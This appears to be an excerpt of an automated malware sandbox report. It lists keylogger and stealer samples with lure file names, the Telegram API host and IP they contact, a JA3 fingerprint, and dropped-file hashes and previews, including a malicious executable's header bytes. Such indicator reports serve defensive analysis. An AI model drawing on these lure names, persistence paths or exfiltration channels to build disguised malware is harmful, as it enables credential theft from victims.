	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quote E68-STD-094.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	DH BL DRAFT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PDF.exe	Get hash	malicious	XWorm	Browse
	soinjector.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote E68-STD-094.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DH BL DRAFT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PDF.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	soinjector.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote E68-STD-094.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DH BL DRAFT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PDF.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	soinjector.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	CONG TY TNHH RAISING VIETNAM - USD 5850.00pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	149.154.167.220
	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	http://unfortunatelydroopinglying.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REMITTANCE ADVICE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://q7ke.glitch.me/?e=mthatha@africawsp.co.za	Get hash	malicious	Unknown	Browse	149.154.167.220
	ROOMING 24034 Period Check-in on July 5th and departure on July 15th, 2024.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://rgbegx.blogspot.pe/	Get hash	malicious	GRQ Scam	Browse	149.154.167.220
	PEDIDO DE COMPRA ROSSELL#U00d3.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Bank Details.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Signed Document..exe	Get hash	malicious	Remcos, DarkTortilla, PureLog Stealer	Browse
	PO CONTRACT.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	image.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	ABA NEW ORDER No.2400228341.pdf.exe	Get hash	malicious	AsyncRAT	Browse
	09099627362726.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exe	Get hash	malicious	DarkTortilla, XWorm	Browse
	719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe	Get hash	malicious	DarkTortilla, XWorm	Browse
	ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exe	Get hash	malicious	DarkTortilla, XWorm	Browse
	F46VBJ6Yvy.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8307272270166688
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugc:gJjJGtpTq2yv1AuNZRY3diu8iBVqFS
MD5:	0ACA3E863F8E7AD2C84E31A97D5A5F3F
SHA1:	8B41F63A8F4356B72E8ECFDEB7516BB562738B56
SHA-256:	C2B7C1F1079DDF582AD0F3EAB6C113D71921DC0315EBCFE88BB1ED5BB4B437FC
SHA-512:	5484F6889821438EEB4B52E1C0F362BABE9AF5AA7824D4D0B6F86D33BB589B91381E7102F0C703FC9D520BB02D03288F8F2FE61897BCB65DB8967DB76B432F1C
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x667f7093, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585346902701245
Encrypted:	false
SSDEEP:	1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	62A4000629FB7786134327F5ADD7386D
SHA1:	B87DAE213DE005D08AC97354A4FBFA2434C0B72C
SHA-256:	2987E6F3189F997CD4C25D29BC8494A47C4C72812C1B8034D70839370F0A4D88
SHA-512:	E6B773CE67764AEBA422AF78E3CAE534A1389EB132B269D0291FF2569111B6FF4941189EF4AA73D1EE7BAE1968DE69CC69230B04E3810C7795E1B6588A763E76
Malicious:	false
Preview:	f.p.... ...............X\...;...{......................0.z..........{..6....\|..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................Z.6....\|..................5.\<6....\|...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08157472752685217
Encrypted:	false
SSDEEP:	3:hSllyYek6jtHGuAJkhvekl1XTru1YllrekGltll/SPj:Q/yzXrxlpTrPJe3l
MD5:	CEB2A9C600AE7F0B650BA884FEBF412E
SHA1:	A8C1B81EE02366FC5B6261D2693CDAC6E61A700D
SHA-256:	1DEF3659BD7F369FDC4262C4C57AB4DE84728C9F72AE3F7649F9304DE358F7F3
SHA-512:	83ABA06589EE7EAF376A2276FB5FDB439F13EFACBDC6D63F7EF459769A61BCF251D067CC5699A77DB34B56980DA0B02EF34E65608ED409AB285F0FC29780C38E
Malicious:	false
Preview:	..v......................................;...{..6....\|.......{...............{.......{...XL......{..................5.\<6....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Windows Logon Application.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Windows Logon Application.exe
File Type:	CSV text
Category:	modified
Size (bytes):	1089
Entropy (8bit):	5.3331074454898735
Encrypted:	false
SSDEEP:	24:ML9E4KlKNE4oK2nMK/KDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlIHoVnM6YHKh3oPtHo6hAHKzeR
MD5:	E54FE55F93C5501D5C4737CCF0E6E48B
SHA1:	BEF9C1A7166E3E8C2C7762C42F8FCBB753B63283
SHA-256:	2434AE4C4C8436A64A4F3317638DF77C38CB7FFC226037ADE1DC6F6CD4745619
SHA-512:	5422F02595B12ACFE23AF8C69ACF43B5529C700FC3FA5ADEDDBDFF36737C22D7AE23FCD4A39869DF6D02D7D708F951142983E60ED90EADFDCE5CC40B164AD19D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\48ee4ec9441351bbe4d9095c96b8ea01\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shost.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLU84qpE4KlKDE4KhKiKhp1qE4jE4KnKIE4oKNzKoZAE4Kze0E4j:Mgv2HKlYHKh3op1qHjHKntHo6hAHKzea
MD5:	01263B040E5D01E8FB65C548515BB5CD
SHA1:	CC1A1A8C0B48CDE58F953CCE76316D55C4219DCF
SHA-256:	957FD12DB472089B9165FBDE6B64E584D706236747D9A57DE9D1756149B33C88
SHA-512:	FEFA50F97E6BDEB5032F8F3E5064BF594B12E305E699C861B8C6B2BC279B3411A50FFBFCEA5CA161A20942F716A4CA9CFD40E8F3F88BDD7AB05F5A343065B094
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380285623575084
Encrypted:	false
SSDEEP:	48:SWSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeC/ZS50Uyus:SLHxvCsIcnSKRHmOugg1s
MD5:	CC53334B3061C08DE724ED16062F8C3C
SHA1:	639F6C258F5014B0EE62135A699AC72B2805D046
SHA-256:	C2E989F8165F322C212815484E3863671F5339AB536F961C7E8212D4669C55C4
SHA-512:	37987D757036D0EF5DF0F45E818636237C1C8981B7B5211C016474CA15AA77FD2C6C61B56E69B6179134FB58A4899F2BFD1D6D6B35F9898CA0B7CFAEE289D907
Malicious:	false
Preview:	@...e.................................K..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	39
Entropy (8bit):	3.7391518977392186
Encrypted:	false
SSDEEP:	3:rRSFHKKWXGAsr4rNrn:EFHKKWXGJrcBn
MD5:	6315B2AA8D45741FD57BD0997637264D
SHA1:	613FF234E30583FEB62E4C951D581FE8FD8EDB04
SHA-256:	766AE5D1129FAB8B5E520D5F82ECC19FF1CB59E91ED949D52D7A500847F21506
SHA-512:	5A2F2A0BB57C079EEC88B5D09C059C7A08E98D04559FEC094E0454F37CC042494FA0247309684441003919D674FD0BB1D63D305242ECC370DAAFD084736C4E22
Malicious:	false
Preview:	....### Photos ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\RarSFX0\Chiara_31Agosto2024.jpg

Download File

Process:	C:\Users\user\Desktop\chiara.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1122x2208, components 3
Category:	dropped
Size (bytes):	221048
Entropy (8bit):	7.979883801880416
Encrypted:	false
SSDEEP:	6144:7IxcDKWknNI8juLutpGsCfoYA47hkdDVAKi:UxMtkNI8yLuDGtNF7LKi
MD5:	EFACA58F948EBDA9AE73BFD50792836B
SHA1:	B4A1851B2FD00EFA438BD44A89EE2F9CD8D2E71B
SHA-256:	11178E527C0A49195B472A2EFF6BCB94751BDBC31BE655D4AE2015B74D4F99B7
SHA-512:	D43958982761F8C50F4713DFDFFEE4D238DF2AD5FA64588610AAA27A10019706BB737A1691D76DF0CF64751C82B07D8B5C626E56EA542BF11B85027885827549
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................b.."................................................................................../u..AB.qP.`.....0L..1...`..0.L..`.....`&&..0...4.........X+.B..@14....u.S...\|......5MA.W..zdi...h....)......w7....nn..\....'\|z...+.L.I..>g..psk+...=......zX...1.....` ..`C.@(c...."...0.....Lh......@.@.i....4.0.. `(...1......Y...._L\|.k..r...\.#\.1.1..k...a.. ,."..p.\|......%.=3..y..wSY.g_'......&.h.s..............'..(N...S......I...@......0.!...0.............i.14.@.Q.."`.b......?3..w..=.d...".jF9.f.EgS..X.X...[.numR^w.t.B.zX.......M.y.2...U..:."E..<^..4..c....L...P..p..:L.4.....40..............0..40....4.h.@.`......7.,.;.O3..w...z<...6\.R\.7.C6..\...a`.zF...J.G.1.G?.7.9.....=+......Vt.o4.\.@_E.......N.1...9h4.(&&......*........0C............!....@L....."...@...j"..?7..7....G.&.&.............rF...k......Rg\..g..y.3....\|.

C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe

Download File

Process:	C:\Users\user\Desktop\chiara.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	978944
Entropy (8bit):	7.063288069355216
Encrypted:	false
SSDEEP:	12288:I2YAeZNz5HAQSBv/1o1+zJtq6mbeY6h7AhrMixF3KF+8OpiVTAN8RAHpK:ZxMJAQSl/+1+LqxbmSrMixFawGANzK
MD5:	7F2742F64322B2D1F9D5EBB7AA83E49A
SHA1:	988A9C28223DA57DE358FF5227B0A395CDC9D4BC
SHA-256:	64AA0B4255C7355DDE459228494E52FA4EAFBEDE311B393585FAF4DC05EABFBE
SHA-512:	656C5E4271AF76149AF22317A22A3159B4A8AFE6AC47E9869D9736C7910FFE4BA0C17787150C8D38C8140D5A8F4A19ADE44D417A0E971E05F15745BFCF14B412
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e#J................................. ... ....@.. .......................`............`.................................t...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............h......4..................................................l...T.....................$..$.m.WWw@..[..&...X.I!...l.9._T..G..9.M.&.SA.xM...\..!....(.6..r..A.#x._.....z..vrY......Ft..t..*w?....o..9.x........./...^....w.I...#..0.....O........Q!YXH..z....{S.c...l......cK.U...4...{K...A..n.@.vc..W.UX,].f`./'2.`..q...[...O..8..B....z.h.....1...i.y.d.s.....n.#.F...k......u......Q.....M...E..D.._y.e.....w..^.R.G.3-.....C8..+zg-.D....E./.w.K.I).

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1o2a25ff.a2w.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h2yx3fp.wrp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4omzvkye.hsp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nc3qvuo.ynx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bda05iyz.rfq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ct2x0byx.d5a.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drtewxfx.imi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edfzrbmq.42q.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f51ukfdn.nmw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdqguv5w.f3s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gng3pwxd.oyi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohyytsgt.jdk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruwnsrk2.cvs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
